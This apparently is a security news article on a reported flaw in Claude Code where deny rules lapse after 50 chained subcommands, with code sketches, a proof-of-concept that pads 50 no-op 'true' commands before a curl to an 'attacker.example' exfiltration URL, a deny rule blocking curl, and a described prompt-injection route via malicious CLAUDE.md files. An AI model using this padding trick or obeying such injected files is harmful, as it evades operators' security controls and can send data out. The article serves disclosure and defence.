product update · Anthropic

Claude Code bypasses safety rules after 50 chained commands, enabling prompt injection attacks

TL;DR

Claude Code stops enforcing configured deny rules, such as a block on curl, when a command contains 50 or more chained subcommands, according to security firm Adversa. The vulnerability stems from a hard-coded MAX_SUBCOMMANDS_FOR_SECURITY_CHECK limit set to 50 in the source code; past that threshold, the system falls back to asking the user for permission rather than enforcing deny rules.



Anthropic's Claude Code will ignore its security deny rules if given a sufficiently long chain of subcommands, enabling attackers to bypass protections against risky operations like network requests. Security firm Adversa discovered the vulnerability following the leak of Claude Code's source code.

The Technical Issue

Claude Code uses deny rules configured in ~/.claude/settings.json to block access to potentially dangerous tools. For example, administrators can prevent curl execution with:

{ "permissions": { "deny": ["Bash(curl:*)"] } }

However, the source code file bashPermissions.ts contains a hard-coded limit: MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. After 50 security-relevant subcommands, the system stops enforcing deny rules and instead asks the user for permission.
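To make the failure mode concrete, here is a minimal TypeScript sketch of the flawed logic as Adversa describes it. The function and parameter names (checkBashPermission, denyPrefixes) are illustrative, and the real bashPermissions.ts parses commands far more carefully; only the constant name and the fallback behavior come from the article.

```typescript
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

type Behavior = "allow" | "ask" | "deny";

// Hypothetical reconstruction of the flawed check, not the actual source.
function checkBashPermission(command: string, denyPrefixes: string[]): Behavior {
  // Split on common shell chaining operators to count subcommands.
  const subcommands = command
    .split(/&&|\|\||;|\|/)
    .map((s) => s.trim())
    .filter((s) => s.length > 0);

  // The flaw: past the cap, fall back to asking the user
  // instead of evaluating deny rules at all.
  if (subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    return "ask";
  }

  if (subcommands.some((sub) => denyPrefixes.some((p) => sub.startsWith(p)))) {
    return "deny";
  }
  return "allow";
}
```

With this shape, a bare `curl` command is denied, but the same `curl` at the end of a 50-subcommand chain only triggers a permission prompt.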

The code references an internal Anthropic issue (CC-643), with a comment noting that 50 was considered "a generous allowance for legitimate usage." This assumption held true for human-authored commands but failed to account for AI-generated attack chains.

Proof of Concept

Adversa demonstrated the vulnerability with a simple attack: they created a bash command combining 50 no-op "true" subcommands followed by a curl command. Claude Code asked for user authorization instead of denying curl outright—effectively bypassing the configured security policy.
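The shape of that payload can be sketched in a few lines; the attacker URL below is made up for illustration. Fifty no-op `true` subcommands push the chain past the cap, so the trailing curl is never matched against deny rules.

```typescript
// 50 no-op subcommands, joined with the shell AND operator.
const padding: string = Array(50).fill("true").join(" && ");

// The denied command rides at the end of the chain (URL is hypothetical).
const payload: string = `${padding} && curl https://attacker.example/exfiltrate`;

// 50 no-ops + 1 curl = 51 subcommands, one past the 50-subcommand cap.
const subcommandCount = payload.split("&&").length;
console.log(subcommandCount); // 51
```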

The attack leverages prompt injection through malicious CLAUDE.md files that instruct the AI to generate 50+ subcommand pipelines disguised as legitimate build processes.

Real-World Impact

The vulnerability poses practical risks in two scenarios:

  1. Developer approval workflows: When developers grant automatic approval (--dangerously-skip-permissions mode) or reflexively click through after long sessions, the bypass succeeds undetected.

  2. CI/CD pipelines: When Claude Code runs in non-interactive mode without human oversight, injected commands bypass security controls entirely.

Status and Fix

Anthropic has already developed a fix internally using a parser called "tree-sitter" that properly validates command chains, but this parser is not included in public builds. Adversa notes that a single-line code change at line 2174 in bashPermissions.ts—switching the "behavior" key from "ask" to "deny"—would immediately resolve this particular vulnerability.
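Assuming a simplified version of the permission check (names illustrative, not the real implementation), the one-line mitigation amounts to failing closed when the cap is exceeded:

```typescript
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

// Hedged sketch of the patched behavior: identical to the flawed check
// except that exceeding the cap now denies instead of asking.
function checkBashPermissionPatched(
  command: string,
  denyPrefixes: string[],
): "allow" | "ask" | "deny" {
  const subcommands = command
    .split(/&&|\|\||;|\|/)
    .map((s) => s.trim())
    .filter((s) => s.length > 0);

  if (subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    return "deny"; // per Adversa, public builds return "ask" here
  }
  return subcommands.some((sub) => denyPrefixes.some((p) => sub.startsWith(p)))
    ? "deny"
    : "allow";
}
```

Failing closed means an over-long chain is rejected outright, which is the conservative default for a security boundary: legitimate 50+ subcommand pipelines are rare enough that the comment in the leaked source called 50 "a generous allowance."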

Anthropic did not respond to requests for comment.

What This Means

The vulnerability highlights a systemic problem: security limits designed around human behavior fail when AI-generated inputs can trivially exceed thresholds. The 50-command cap assumed legitimate, human-authored usage would stay well under the threshold, but AI agents can generate arbitrarily long command chains within a single prompt.

While the fix is straightforward, the discovery raises broader questions about Claude Code's deployment in automated environments where security assumptions may not hold. Organizations using Claude Code in CI/CD or other automated contexts should treat deny rules as a policy layer only—not a technical enforcement mechanism—until Anthropic patches this issue.
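Until a patch ships, automated pipelines can add their own guard. A minimal sketch (names hypothetical, not part of Claude Code): reject any generated command whose subcommand count exceeds the known cap before it ever reaches the tool, so the "ask" fallback cannot fire unattended.

```typescript
// The cap reported for public Claude Code builds; treat chains past it as hostile.
const KNOWN_SUBCOMMAND_CAP = 50;

// Hypothetical pre-filter for CI/CD wrappers around Claude Code.
function isSuspiciousChain(command: string): boolean {
  const count = command
    .split(/&&|\|\||;|\|/)
    .filter((s) => s.trim().length > 0).length;
  return count > KNOWN_SUBCOMMAND_CAP;
}
```

A wrapper would drop or log any command where isSuspiciousChain returns true, restoring fail-closed behavior at the pipeline boundary rather than inside the tool.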

